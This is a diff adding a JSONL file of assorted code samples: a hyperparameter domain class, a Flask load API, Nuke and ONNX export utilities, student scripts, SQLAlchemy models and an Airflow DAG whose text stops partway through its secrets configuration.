diff --git "a/4839.jsonl" "b/4839.jsonl" new file mode 100644--- /dev/null +++ "b/4839.jsonl" @@ -0,0 +1,688 @@ +{"seq_id":"305459625","text":"\"\"\"Hyperparameter domain for exhaustive grid search.\n\nClasses\n-------\nExhaustiveDomain\n Discrete/categorical domain for exhaustive grid search.\n\"\"\"\n\nfrom collections import Sequence\n\nfrom pyrameter.domains.base import Domain\n\n\nclass ExhaustiveDomain(Domain):\n \"\"\"Discrete/categorical domain for exhaustive grid search.\n\n Parameters\n ----------\n name : str\n Name of the domain.\n domain : list\n The grid to search.\n\n Notes\n -----\n Instead of using internal tracking to determine which part of the grid to\n search, this domain is a placeholder used to spawn multiple search space\n graphs. As of now, it is not directly used to generate values.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n if len(args) >= 2:\n super(ExhaustiveDomain, self).__init__(args[0])\n self.domain = args[1]\n elif len(args) == 1:\n super(ExhaustiveDomain, self).__init__()\n self.domain = args[0]\n else:\n raise ValueError('No domain provided.')\n\n @classmethod\n def from_json(cls, obj):\n domain = cls(obj['name'], obj['domain'])\n return domain\n\n @property\n def complexity(self):\n if self._complexity is None:\n try:\n self._complexity = 2 - (1 / len(self.domain))\n except ZeroDivisionError:\n self._complexity = 1\n return self._complexity\n\n def generate(self):\n raise NotImplementedError\n\n def to_json(self):\n jsonified = super(ExhaustiveDomain, self).to_json()\n del jsonified['random_state']\n return jsonified\n","sub_path":"pyrameter/domains/exhaustive.py","file_name":"exhaustive.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"92741023","text":"from flask import Blueprint, request\nfrom google.cloud import datastore\nimport verificationHelper\nimport json\nimport constants\n\nclient = datastore.Client()\n\nbp = Blueprint('load', __name__, url_prefix='/loads')\n\n\n@bp.route('/', methods=['POST', 'GET'])\ndef loads_get_post():\n if request.method == 'POST':\n content = request.get_json()\n payload = verificationHelper.verify_jwt(request)\n if len(payload) == 0:\n return (\"INVALID JWT\", 401)\n if 'destination' not in content.keys():\n return(\"need a destination\", 400)\n if 'weight' not in content.keys():\n return(\"need a weight\", 400)\n if 'contents' not in content.keys():\n return(\"need to know contents\", 400)\n new_load = datastore.entity.Entity(key=client.key(constants.loads))\n new_load.update({'owner': payload, 'weight': content['weight'],\n 'contents': content['contents'], 'destination': content['destination'],\n 'boat': ''})\n client.put(new_load)\n return (str(new_load.key.id), 201)\n elif request.method == 'GET':\n query = client.query(kind=constants.loads)\n q_limit = int(request.args.get('limit', '5'))\n q_offset = int(request.args.get('offset', '0'))\n g_iterator = query.fetch(limit= q_limit, offset=q_offset)\n pages = g_iterator.pages\n results = list(next(pages))\n if g_iterator.next_page_token:\n next_offset = q_offset + q_limit\n next_url = request.base_url + \"?limit=\" + str(q_limit) + \"&offset=\" + str(next_offset)\n else:\n next_url = None\n for e in results:\n e[\"self\"] = request.host_url + 'loads/' + str(e.key.id)\n output = {\"loads\": results}\n if next_url:\n output[\"next\"] = next_url\n return json.dumps(output)\n\n\n@bp.route('/', methods=['DELETE', 'GET', 'PATCH'])\ndef loads_put_delete(id):\n if 
request.method == 'DELETE':\n content = request.get_json()\n payload = verificationHelper.verify_jwt(request)\n if len(payload) == 0:\n return (\"INVALID JWT\", 401)\n load_key = client.key(constants.loads, int(id))\n load = client.get(key=load_key)\n if load is None:\n return('Invalid load ID', 404)\n elif load['owner'] != payload:\n return('Not your load to delete', 403)\n elif load['boat'] == '':\n client.delete(load_key)\n return('', 204)\n else:\n boat_key = client.key(constants.boats, int(load['boat']))\n boat = client.get(key=boat_key)\n boat['loads'].remove(str(id))\n client.put(boat)\n client.delete(load_key)\n return ('', 204)\n elif request.method == 'GET':\n load_key = client.key(constants.loads, int(id))\n load = client.get(key=load_key)\n if load is None:\n return('Invalid load ID', 404)\n else:\n return (load, 200)\n elif request.method == 'PATCH':\n content = request.get_json()\n payload = verificationHelper.verify_jwt(request)\n if len(payload) == 0:\n return (\"INVALID JWT\", 401)\n load_key = client.key(constants.loads, int(id))\n load = client.get(key=load_key)\n if load is None:\n return('Invalid load ID', 404)\n elif load['owner'] != payload:\n return('Not your load to edit', 403)\n if 'weight' not in content.keys():\n return('I only edit weight', 400)\n else:\n load[\"weight\"] = content[\"weight\"]\n client.put(load)\n return(load, 200)\n else:\n return ('Method not recognized', 405)","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"179957325","text":"import nuke\n\ndef connect_optical_flares():\n\n node_list = nuke.selectedNodes()\n \n if len(node_list) < 2:\n print('select one or more transforms, followed by an OpticalFlares node')\n return\n \n if node_list[0].Class() != 'OpticalFlares':\n print('Select the OpticalFlares node last')\n return\n\n \n optical_flare_node = node_list[0]\n t_node_list = node_list[1:]\n\n num_transforms = len(t_node_list)\n optical_flare_node['Count'].setValue(num_transforms-1)\n\n for index, t_node in enumerate(t_node_list):\n \n if index == 0:\n knob = optical_flare_node['PositionXY']\n else:\n knob = optical_flare_node['PositionXY{0}'.format(index)]\n\n knob.copyAnimations(t_node['translate'].animations())\n\n\n\n#connect_optical_flares()\n\n\n''' \nnode = nuke.toNode('OpticalFlares1')\n\nfor i in range (node.getNumKnobs()):\n print node.knob(i).name()\n'''\n\n","sub_path":"petfactory/animation/optical_flares/optical_flares.py","file_name":"optical_flares.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"155399133","text":"def convert(s):\n for i in ['B', 'KB', 'MB', 'GB']:\n if s > 1024:\n s /= 1024\n else:\n size_memory = str(float(\"{:.2f}\".format(s))) + i\n break\n return size_memory\n\n\ndef path(s):\n s = s.replace('/', '\\\\')\n return s\n","sub_path":"config/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"54430367","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 12 15:54:51 2021\r\n\r\n@author: Ria Kale\r\n\r\nThis function is designed to output the price a customer will have to pay for a mattress\r\nafter inputting variables\r\n\r\nI completed this assignment individually\r\n\"\"\"\r\n\r\nprices = 
[[[1800,2200,2400],[1400,1800,200],[900,1300,1500]],[[2000,2500,3000],[1400,1900,2400],[1000,1500,2000]], [400,300,200,100], [100,300]]\r\nidentifiers = [[\"Sealy Mattress\", \"Simmons Mattress\"], [\"King Size\", \"Queen Size\", \"Full Size\", \"Twin Size\"], [\"Medium\", \"Firm\", \"Extra Firm\"]]\r\n\r\ndef mattressPOS(prices):\r\n print(\"Welcome!\")\r\n while True: \r\n brand = input(\"Please select the mattress brand (1 - Sealy, 2 - Simmons):\")\r\n if brand == \"1\" :\r\n brand = 0\r\n size = input(\"Please select the size (K = King, Q = Queen, T = Twin):\")\r\n break\r\n elif brand == \"2\" :\r\n brand = 1\r\n size = input(\"Please select the size (K = King, Q = Queen, F = Full):\")\r\n break\r\n else:\r\n print (\"Please enter a valid response\")\r\n \r\n while True:\r\n if size == \"K\" or size.lower() == \"k\":\r\n size = 0\r\n break\r\n elif size == \"Q\" or size.lower() == \"q\":\r\n size = 1\r\n break\r\n elif size == \"T\" or size.lower() == \"t\":\r\n size = 2\r\n break\r\n elif size == \"F\" or size.lower() == \"f\":\r\n size = 2\r\n break\r\n else:\r\n print(\"Please enter a valid response\")\r\n size = input(\"Please select the size (K = King, Q = Queen, F = Full, T = Twin):\")\r\n \r\n while True:\r\n comfort = input(\"Please select comfort level (M - Medium, F - Firm, E - Extra Firm):\")\r\n if comfort == \"M\" or comfort.lower() == \"m\":\r\n comfort = 0\r\n break\r\n elif comfort == \"F\" or comfort.lower() == \"f\":\r\n comfort = 1\r\n break\r\n elif comfort == \"E\" or comfort.lower() == \"e\":\r\n comfort = 2\r\n break\r\n else:\r\n print(\"Please enter a valid response\")\r\n \r\n while True:\r\n box_spring = input(\"Would you like to add box springs (Y - Yes, N - No)?\")\r\n if box_spring ==\"Y\" or box_spring.lower() == \"y\":\r\n box_spring = True\r\n break\r\n elif box_spring ==\"N\" or box_spring.lower() == \"n\":\r\n box_spring = False\r\n break\r\n else:\r\n print(\"Please enter a valid response\")\r\n \r\n while True:\r\n shipping = input(\"Which shipping mode do you like (S - Standard, N - Next Day)?\")\r\n if shipping ==\"S\" or shipping.lower() == \"s\":\r\n shipping = 0\r\n break\r\n elif shipping ==\"N\" or shipping.lower() == \"n\":\r\n shipping = 1\r\n break\r\n else:\r\n print(\"Please enter a valid response\")\r\n \r\n promo_code = input(\"Promotion Code:\")\r\n print( )\r\n print( )\r\n \r\n \r\n mattress_price = prices[brand][size][comfort]\r\n formatted_mattress_price = \"${:,.2f}\".format(mattress_price)\r\n \r\n if brand == 0 and size == 2:\r\n size = 3\r\n box_spring_price = prices[2][size] if box_spring else 0\r\n formatted_spring_price = \"${:,.2f}\".format(box_spring_price)\r\n \r\n if promo_code.lower() == \"sleep\":\r\n promo_code = -((mattress_price + box_spring_price) * 0.1)\r\n else:\r\n promo_code = 0\r\n \r\n formatted_promo_code = \"${:,.2f}\".format(promo_code)\r\n \r\n subtotal = mattress_price + box_spring_price + promo_code\r\n formatted_subtotal = \"${:,.2f}\".format(subtotal)\r\n \r\n shipping_price = prices[3][shipping]\r\n formatted_shipping_price = \"${:,.2f}\".format(shipping_price)\r\n \r\n tax_rate = subtotal*0.0625\r\n formatted_tax = \"${:,.2f}\".format(tax_rate)\r\n \r\n total = subtotal + shipping_price + tax_rate\r\n formatted_total = \"${:,.2f}\".format(total)\r\n \r\n id_1 = identifiers[0][brand]\r\n id_2 = identifiers[1][size]\r\n id_3 = identifiers[2][comfort]\r\n \r\n print(id_1,\",\", id_2,\",\", id_3)\r\n print( )\r\n print(\"=\"*15, \"Order Summary\", \"=\"*15 )\r\n print( )\r\n print(f\"{'Mattress:':<24} {formatted_mattress_price:>8}\")\r\n print(f\"{'Box Springs:':<24} 
{formatted_spring_price:>8}\")\r\n print(f\"{'Discount:':<24} {formatted_promo_code:>8}\")\r\n print(f\"{'Subtotal:':<24} {formatted_subtotal:>8}\")\r\n print(f\"{'Shipping:':<24} {formatted_shipping_price:>8}\")\r\n print(f\"{'Tax:':<24} {formatted_tax:>8}\")\r\n print(\"-\"*46)\r\n print(f\"{'Total:':<24} {formatted_total:>8}\")\r\n \r\nmattressPOS(prices)","sub_path":"mattress.py","file_name":"mattress.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"128090305","text":"# import get_int from cs50 library\nfrom cs50 import get_int\n\n# Initialize condition\nrequire = False\nwhile not require:\n # prompt the user to the size of the half-pyramid\n n = get_int(\"Height: \")\n if n >= 1 and n <= 8:\n require = True\n\n# go through each line\nfor i in range(n):\n # print hashes in each line\n print(\" \" * (n - i - 1) + \"#\" * (i + 1))","sub_path":"CS50_2020/Week6/Mario/Less/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"138561744","text":"import datetime\nimport io\nimport itertools\nimport json\nimport os\nimport subprocess\nimport warnings\n\nimport onnx\nimport onnx.numpy_helper\nimport torch\nimport torch.autograd\nfrom torch.onnx import OperatorExportTypes\nfrom torch.onnx.symbolic_helper import _default_onnx_opset_version\nfrom torch.onnx.utils import \\\n _export as torch_export, _model_to_graph as torch_model_to_graph\n\nfrom pytorch_pfn_extras.onnx.annotate import init_annotate\nfrom pytorch_pfn_extras.onnx.strip_large_tensor import \\\n LARGE_TENSOR_DATA_THRESHOLD\nfrom pytorch_pfn_extras.onnx.strip_large_tensor import is_large_tensor\nfrom pytorch_pfn_extras.onnx.strip_large_tensor import _strip_raw_data\nfrom pytorch_pfn_extras.onnx.strip_large_tensor import \\\n _strip_large_initializer_raw_data\n\n\ndef _model_to_graph_with_value_names(*args, add_value_names=True, **kwargs):\n g, p, o = torch_model_to_graph(*args, **kwargs)\n if not add_value_names:\n return g, p, o\n\n for n in g.nodes():\n for v in itertools.chain(n.inputs(), n.outputs()):\n if not v.debugName().isnumeric():\n continue\n old_name = v.debugName()\n new_name = 'v{}_{}'.format(old_name, n.kind().split('::')[-1])\n v.setDebugName(new_name)\n if old_name in p:\n i = p[old_name]\n del p[old_name]\n p[new_name] = i\n return g, p, o\n\n\ndef _export_meta(model, out_dir, strip_large_tensor_data, user_meta):\n ret = {\n 'generated_at': datetime.datetime.now().isoformat(),\n 'output_directory': out_dir,\n 'exporter': 'torch-onnx-utils',\n 'strip_large_tensor_data': strip_large_tensor_data,\n }\n if user_meta:\n ret['user_meta'] = user_meta\n\n try:\n git_status = subprocess.Popen(['git', 'status'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n git_status.communicate()\n\n def strip_cmd(cmd):\n with os.popen(cmd) as f:\n return f.read().strip()\n if git_status.returncode == 0:\n ret['git'] = {\n 'branch': strip_cmd('git rev-parse --abbrev-ref HEAD'),\n 'commit': strip_cmd('git rev-parse HEAD'),\n 'remote': strip_cmd('git ls-remote --get-url origin'),\n 'commit_date': strip_cmd('git show -s --format=%ci HEAD'),\n }\n except FileNotFoundError:\n pass\n\n return ret\n\n\ndef _export_util(model, args, f, **kwargs):\n \"\"\"Wrap operator type to export\n\n Copied from torch.onnx.utils.export, to get output values.\n \"\"\"\n aten = kwargs.get('aten', False)\n export_raw_ir = 
kwargs.get('export_raw_ir', False)\n operator_export_type = kwargs.get('operator_export_type', None)\n\n if aten or export_raw_ir:\n assert operator_export_type is None\n assert aten ^ export_raw_ir\n operator_export_type = OperatorExportTypes.ATEN if\\\n aten else OperatorExportTypes.RAW\n elif operator_export_type is None:\n if torch.onnx.PYTORCH_ONNX_CAFFE2_BUNDLE:\n operator_export_type = OperatorExportTypes.ONNX_ATEN_FALLBACK\n else:\n operator_export_type = OperatorExportTypes.ONNX\n\n old_model_to_graph = torch.onnx.utils._model_to_graph\n # TODO(ecastill) _model_to_graph shouldn't be directly overridden\n # This is a temporary workaround until a fix is introduced in PyTorch.\n try:\n torch.onnx.utils._model_to_graph = _model_to_graph_with_value_names\n return torch_export(model, args, f, _retain_param_name=True, **kwargs)\n finally:\n torch.onnx.utils._model_to_graph = old_model_to_graph\n\n\ndef _export(\n model, args, strip_large_tensor_data=False,\n large_tensor_threshold=LARGE_TENSOR_DATA_THRESHOLD, **kwargs):\n model.zero_grad()\n bytesio = io.BytesIO()\n opset_ver = kwargs.get('opset_version', None)\n if opset_ver is None:\n opset_ver = _default_onnx_opset_version\n strip_doc_string = kwargs.pop('strip_doc_string', True)\n with init_annotate(model, opset_ver) as ann:\n outs = _export_util(\n model, args, bytesio, strip_doc_string=False, **kwargs)\n onnx_graph = onnx.load(io.BytesIO(bytesio.getvalue()))\n onnx_graph = ann.set_annotate(onnx_graph)\n onnx_graph = ann.reorg_anchor(onnx_graph)\n if strip_doc_string:\n for node in onnx_graph.graph.node:\n node.doc_string = b''\n if strip_large_tensor_data:\n _strip_large_initializer_raw_data(onnx_graph, large_tensor_threshold)\n\n return onnx_graph, outs\n\n\ndef export(\n model, args, f, return_output=False, strip_large_tensor_data=False,\n large_tensor_threshold=LARGE_TENSOR_DATA_THRESHOLD, **kwargs):\n \"\"\"Export model into ONNX Graph.\n\n Args:\n f: A file-like object or a string file path to be written to this\n file.\n return_output (bool): If True, return the output values that come from\n the model.\n strip_large_tensor_data (bool): If True, this function will strip\n data of large tensors to reduce ONNX file size for benchmarking\n large_tensor_threshold (int): If number of elements of tensor is\n larger than this value, the tensor is stripped when\n *strip_large_tensor_data* is True\n\n .. warning:: This function is not thread safe.\n\n \"\"\"\n onnx_graph, outs = _export(\n model, args, strip_large_tensor_data, large_tensor_threshold,\n **kwargs)\n\n if hasattr(f, 'write'):\n f.write(onnx_graph.SerializeToString())\n else:\n assert isinstance(f, str)\n warnings.warn(\n 'When exporting an ONNX graph to a file, \"export_testcase\" is '\n 'strongly recommended; please consider using it instead',\n UserWarning)\n with open(f, 'wb') as fp:\n fp.write(onnx_graph.SerializeToString())\n\n if return_output:\n return outs\n\n\ndef export_testcase(\n model, args, out_dir, *, output_grad=False, metadata=True,\n model_overwrite=True, strip_large_tensor_data=False,\n large_tensor_threshold=LARGE_TENSOR_DATA_THRESHOLD,\n return_output=False, user_meta=None,\n export_torch_script=False, export_torch_trace=False, **kwargs):\n \"\"\"Export model and I/O tensors of the model in protobuf format.\n\n Args:\n output_grad (bool or Tensor): If True, this function will output\n model's gradient with names 'gradient_%d.pb'. If set to a Tensor,\n use it as the gradient *input*. 
The gradient inputs are output as\n 'gradient_input_%d.pb' along with the gradients.\n metadata (bool): If True, output meta information taken from git log.\n model_overwrite (bool): If False and model.onnx already exists,\n only export input/output data as another test dataset.\n strip_large_tensor_data (bool): If True, this function will strip\n data of large tensors to reduce ONNX file size for benchmarking\n large_tensor_threshold (int): If number of elements of tensor is\n larger than this value, the tensor is stripped when\n *strip_large_tensor_data* is True\n return_output (bool): If True, return the output values that come from\n the model.\n export_torch_script (bool): Output model_script.pt using\n torch.jit.script\n export_torch_trace (bool): Output model_trace.pt using torch.jit.trace\n\n .. warning:: This function is not thread safe.\n\n \"\"\"\n\n os.makedirs(out_dir, exist_ok=True)\n input_names = kwargs.pop(\n 'input_names',\n ['input_{}'.format(i) for i in range(len(args))])\n assert len(input_names) == len(args)\n\n onnx_graph, outs = _export(\n model, args, strip_large_tensor_data, large_tensor_threshold,\n input_names=input_names, **kwargs)\n if isinstance(args, torch.Tensor):\n args = args,\n if isinstance(outs, torch.Tensor):\n outs = outs,\n\n # Remove unused inputs\n # - When keep_initializers_as_inputs=True, the inputs contain initializers.\n # So we have to filter out initializers.\n # - model.onnx is already issued, so we can modify args here.\n initializer_names = [init.name for init in onnx_graph.graph.initializer]\n used_input_index_list = []\n for used_input in onnx_graph.graph.input:\n if used_input.name not in initializer_names:\n used_input_index_list.append(input_names.index(used_input.name))\n input_names = [input_names[i] for i in used_input_index_list]\n args = [args[i] for i in used_input_index_list]\n\n output_path = os.path.join(out_dir, 'model.onnx')\n is_on_memory = True\n if model_overwrite or (not os.path.isfile(output_path)):\n is_on_memory = False\n with open(output_path, 'wb') as fp:\n fp.write(onnx_graph.SerializeToString())\n\n def write_to_pb(f, tensor, name=None):\n array = tensor.detach().cpu().numpy()\n with open(f, 'wb') as fp:\n t = onnx.numpy_helper.from_array(array, name)\n if (strip_large_tensor_data\n and is_large_tensor(t, large_tensor_threshold)):\n _strip_raw_data(t)\n fp.write(t.SerializeToString())\n\n if export_torch_script:\n pt_script_path = os.path.join(out_dir, 'model_script.pt')\n if model_overwrite or (not os.path.isfile(pt_script_path)):\n torch.jit.script(model).save(pt_script_path)\n\n if export_torch_trace:\n pt_trace_path = os.path.join(out_dir, 'model_trace.pt')\n if model_overwrite or (not os.path.isfile(pt_trace_path)):\n torch.jit.trace(model, args).save(pt_trace_path)\n\n data_set_path = os.path.join(out_dir, 'test_data_set_0')\n seq_id = 0\n while is_on_memory and os.path.exists(data_set_path):\n seq_id += 1\n data_set_path = os.path.join(\n out_dir, 'test_data_set_{:d}'.format(seq_id))\n os.makedirs(data_set_path, exist_ok=True)\n for i, (arg, name) in enumerate(zip(args, input_names)):\n f = os.path.join(data_set_path, 'input_{}.pb'.format(i))\n write_to_pb(f, arg, name)\n\n output_names = kwargs.get('output_names')\n if output_names is None:\n if isinstance(outs, dict):\n output_names = outs.keys()\n else:\n output_names = [None] * len(outs)\n for i, name in enumerate(output_names):\n if isinstance(outs, dict):\n out = outs[name]\n else:\n out = outs[i]\n if isinstance(out, (list, tuple)):\n assert len(out) == 1, \\\n 
'Models returning nested lists/tuples are not supported yet'\n out = out[0]\n f = os.path.join(data_set_path, 'output_{}.pb'.format(i))\n write_to_pb(f, out, name)\n\n if output_grad is not False:\n if isinstance(output_grad, bool):\n output_grad = [torch.ones_like(outs[idx])\n for idx in range(len(output_names))]\n if isinstance(output_grad, torch.Tensor):\n output_grad = [output_grad]\n for idx in range(len(output_names)):\n write_to_pb(\n os.path.join(data_set_path, 'gradient_input_{}.pb'.format(\n idx)), output_grad[idx],\n output_names[idx])\n if len(output_names) == len(outs):\n torch.autograd.backward(outs, grad_tensors=output_grad)\n else:\n assert len(\n output_names) == 1, 'Only a single output name is supported'\n outs[0].backward(output_grad[0])\n\n for i, (name, param) in enumerate(model.named_parameters()):\n f = os.path.join(data_set_path, 'gradient_{}.pb'.format(i))\n # NOTE: name does not follow C identifier syntax rules,\n # like \"fc1.bias\"; not cleansed for now\n if param.grad is None:\n warnings.warn(\n 'Parameter `{}` does not have a gradient value'.format(name))\n else:\n write_to_pb(f, param.grad, name)\n\n if user_meta is None:\n user_meta = {}\n\n if metadata:\n with open(os.path.join(out_dir, 'meta.json'), 'w') as f:\n json.dump(_export_meta(model, out_dir, strip_large_tensor_data,\n user_meta), f, indent=2)\n elif user_meta:\n warnings.warn(\n '\"user_meta\" is given but \"metadata\" is False. '\n '\"user_meta\" is not exported.',\n UserWarning)\n\n if return_output:\n return outs\n","sub_path":"pytorch_pfn_extras/onnx/export_testcase.py","file_name":"export_testcase.py","file_ext":"py","file_size_in_byte":12510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"605911847","text":"import torch\nimport sys\nfrom fairseq.models.bart import BARTModel\nfrom tqdm import tqdm \n\n\nsplit = sys.argv[1]\n\nbart = BARTModel.from_pretrained(\n 'tmp/saved_models_final/',\n checkpoint_file='checkpoint_best.pt',\n data_name_or_path='commongen-bin'\n)\n\nbart.cuda()\nbart.eval()\nbart.half()\ncount = 1\nbsz = 256\nwith open('../../../evaluation/csqa/csqa.%s.qac.src'%split) as source:\n source_lines = source.read().split(\"\\n\")\nsline = source_lines[0]\nslines = [sline]\ni = 0\nres = []\nscores = []\nfor sline in tqdm(source_lines[1:]):\n if count % bsz == 0:\n with torch.no_grad():\n hypotheses_batch = bart.sample(slines, output_score=True, beam=5, lenpen=0, max_len_b=64, no_repeat_ngram_size=2, min_len=2)\n\n for hypothesis in hypotheses_batch:\n res.append(hypothesis[0])\n scores.append(hypothesis[1])\n # fout.write(hypothesis + '\\n')\n # fout.flush()\n slines = []\n i += 1\n # print(i)\n slines.append(sline.strip())\n count += 1\nif slines != []:\n hypotheses_batch = bart.sample(slines, output_score=True, beam=5, lenpen=0, max_len_b=64, no_repeat_ngram_size=2, min_len=2)\n for hypothesis in hypotheses_batch:\n res.append(hypothesis[0])\n scores.append(hypothesis[1])\n # fout.write(hypothesis + '\\n')\n # fout.flush()\nwith open('../../../evaluation/csqa/csqa.%s.qac.bart.res'%split, 'w') as fout:\n fout.write(\"\\n\".join(res))\n\nwith open('../../../evaluation/csqa/csqa.%s.qac.bart.scores'%split, 'w') as fout:\n fout.write(\"\\n\".join([str(float(s)) for s in scores]))\n ","sub_path":"methods/BART/fairseq_local/bart-csqa.py","file_name":"bart-csqa.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"94218797","text":"from 
sqlalchemy import Table, Column, Integer, Text, Float, ForeignKey, Date\r\nfrom sqlalchemy.orm import mapper\r\nfrom database import metadata, db_session\r\n\r\nclass BlogPost(object):\r\n query = db_session.query_property()\r\n def __init__(self, id=None, title=None, post=None):\r\n self.id = id\r\n self.title = title\r\n self.post = post\r\n\r\nblog_posts = Table('blog_posts', metadata,\r\n Column('id', Integer, primary_key=True),\r\n Column('title', Text),\r\n Column('post', Text)\r\n)\r\n\r\nmapper(BlogPost, blog_posts)\r\n\r\n\r\nclass Item_details(object):\r\n query = db_session.query_property()\r\n def __init__(self, item_id=None, item_name=None,carbon_intensity=None,type_name=None,kg=None):\r\n self.item_id = item_id\r\n self.item_name = item_name\r\n self.carbon_intensity=carbon_intensity\r\n self.type_name=type_name\r\n self.kg=kg\r\n\r\n def serialize(self):\r\n \treturn {\"item_id\":self.item_id,\"item_name\":self.item_name,\"carbon_intensity\":self.carbon_intensity,\"type_name\":self.type_name,\"kg\":self.kg}\r\n \r\n\r\nitems = Table('item_details', metadata,\r\n Column('item_id', Integer, primary_key=True),\r\n Column('item_name', Text),\r\n Column('type_name', Text),\r\n Column('carbon_intensity',Float),\r\n Column('kg',Float)\r\n \r\n)\r\n\r\nmapper(Item_details, items)\r\n\r\n\r\nclass Color(object):\r\n query = db_session.query_property()\r\n def __init__(self, color_id=None, color_name=None):\r\n self.color_id = color_id\r\n self.color_name = color_name\r\n\r\n def serialize(self):\r\n \treturn {\"color_id\":self.color_id,\"color_name\":self.color_name}\r\n \r\n\r\ncolors = Table('colors', metadata,\r\n Column('color_id', Integer, primary_key=True),\r\n Column('color_name', Text)\r\n \r\n)\r\n\r\nmapper(Color, colors)\r\n\r\n\r\nclass Year(object):\r\n query = db_session.query_property()\r\n def __init__(self, year_id=None, year_range=None):\r\n self.year_id = year_id\r\n self.year_range = year_range\r\n\r\n\r\n def serialize(self):\r\n \treturn {\"year_id\":self.year_id,\"year_range\":self.year_range}\r\n \r\n\r\nyears = Table('years', metadata,\r\n Column('year_id', Integer, primary_key=True),\r\n Column('year_range', Text)\r\n \r\n)\r\n\r\nmapper(Year, years)\r\n\r\nclass Postitem(object):\r\n query = db_session.query_property()\r\n def __init__(self, post_id=None,item_id=None,color_id=None,year_id=None,latitude=None,longitude=None,status=None):\r\n self.post_id=post_id\r\n self.item_id=item_id\r\n self.color_id=color_id\r\n self.year_id=year_id\r\n self.latitude=latitude\r\n self.longitude=longitude\r\n self.status=status\r\n\r\n def serialize(self):\r\n \treturn {\"post_id\":self.post_id,\"item_id\":self.item_id,\"color_id\":self.color_id,\"year_id\":self.year_id,\"latitude\":self.latitude,\"longitude\":self.longitude,\"status\":self.status}\r\n \r\n\r\nposts = Table('posts', metadata,\r\n Column('post_id', Integer, primary_key=True),\r\n Column('item_id', Integer, ForeignKey(Item_details.item_id)),\r\n Column('color_id', Integer,ForeignKey(Color.color_id)),\r\n Column('year_id', Integer,ForeignKey(Year.year_id)),\r\n Column('latitude', Float),\r\n Column('longitude', Float),\r\n Column('status', Integer),\r\n \r\n)\r\n\r\n\r\nmapper(Postitem, posts)\r\n\r\nclass Carbon(object):\r\n query = db_session.query_property()\r\n def __init__(self, record_id=None, item_name=None,carbon_intensity=None):\r\n self.record_id = record_id\r\n self.item_name = item_name\r\n self.carbon_intensity=carbon_intensity\r\n\r\n def serialize(self):\r\n \treturn 
{\"record_id\":self.record_id,\"item_name\":self.item_name,\"carbon_intensity\":self.carbon_intensity}\r\n \r\n\r\ncarbons = Table('carbonintensity', metadata,\r\n Column('record_id', Integer, primary_key=True),\r\n Column('item_name', Text),\r\n Column('carbon_intensity',Float)\r\n \r\n)\r\n\r\nmapper(Carbon, carbons)\r\n\r\nclass UserDetail(object):\r\n\tquery = db_session.query_property()\r\n\tdef __init__(self,user_email=None,user_name=None):\r\n\t\tself.user_email = user_email\r\n\t\tself.user_name = user_name\r\n\tdef serialize(self):\r\n\t\treturn {\"user_email\":self.user_email,\"user_name\":self.user_name}\r\n \r\n\r\nuserDetail = Table('user_details', metadata,\r\n Column('user_email', Text, primary_key=True),\r\n Column('user_name', Text)\r\n \r\n \r\n)\r\n\r\nmapper(UserDetail, userDetail)\r\n\r\n\r\nclass UserActivity(object):\r\n query = db_session.query_property()\r\n def __init__(self,record_id=None,user_email=None,post_id=None,contributed_date=None,activity_category=None):\r\n \tself.record_id=record_id\r\n \tself.user_email = user_email\r\n \tself.contributed_date = contributed_date\r\n \tself.post_id=post_id\r\n \tself.activity_category=activity_category\r\n \r\n\r\n def serialize(self):\r\n \treturn {\"record_id\":self.record_id,\"user_email\":self.user_email,\"post_id\":self.post_id,\"contributed_date\":self.contributed_date,\"activity_category\":self.activity_category}\r\n \r\n\r\nuserActivity = Table('user_activity', metadata,\r\n\tColumn('record_id', Integer, primary_key=True),\r\n Column('user_email', ForeignKey(UserDetail.user_email)),\r\n Column('post_id', Integer,ForeignKey(Postitem.post_id)),\r\n Column('contributed_date',Date),\r\n Column('activity_category',Integer)\r\n \r\n \r\n)\r\n\r\nmapper(UserActivity, userActivity)\r\n\r\n\r\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"260861665","text":"import os\n\nfrom airflow.models import DAG\nfrom airflow.operators.docker_operator import DockerOperator\nfrom pendulum import datetime, duration\n\nfrom utils.onepassword import get_env_vars_task\nfrom utils.knack import get_date_filter_arg\nfrom utils.slack_operator import task_fail_slack_alert\n\nDEPLOYMENT_ENVIRONMENT = os.getenv(\"ENVIRONMENT\", \"development\")\n\nDEFAULT_ARGS = {\n \"owner\": \"airflow\",\n \"depends_on_past\": False,\n \"start_date\": datetime(2015, 1, 1, tz=\"America/Chicago\"),\n \"email_on_failure\": False,\n \"email_on_retry\": False,\n \"retries\": 0,\n \"execution_timeout\": duration(minutes=5),\n \"on_failure_callback\": task_fail_slack_alert,\n}\n\nREQUIRED_SECRETS = {\n \"KNACK_APP_ID\": {\n \"opitem\": \"Knack Signs and Markings\",\n \"opfield\": f\"production.appId\",\n },\n \"KNACK_API_KEY\": {\n \"opitem\": \"Knack Signs and Markings\",\n \"opfield\": f\"production.apiKey\",\n },\n \"PGREST_ENDPOINT\": {\n \"opitem\": \"atd-knack-services PostgREST\",\n \"opfield\": \"production.endpoint\",\n },\n \"PGREST_JWT\": {\n 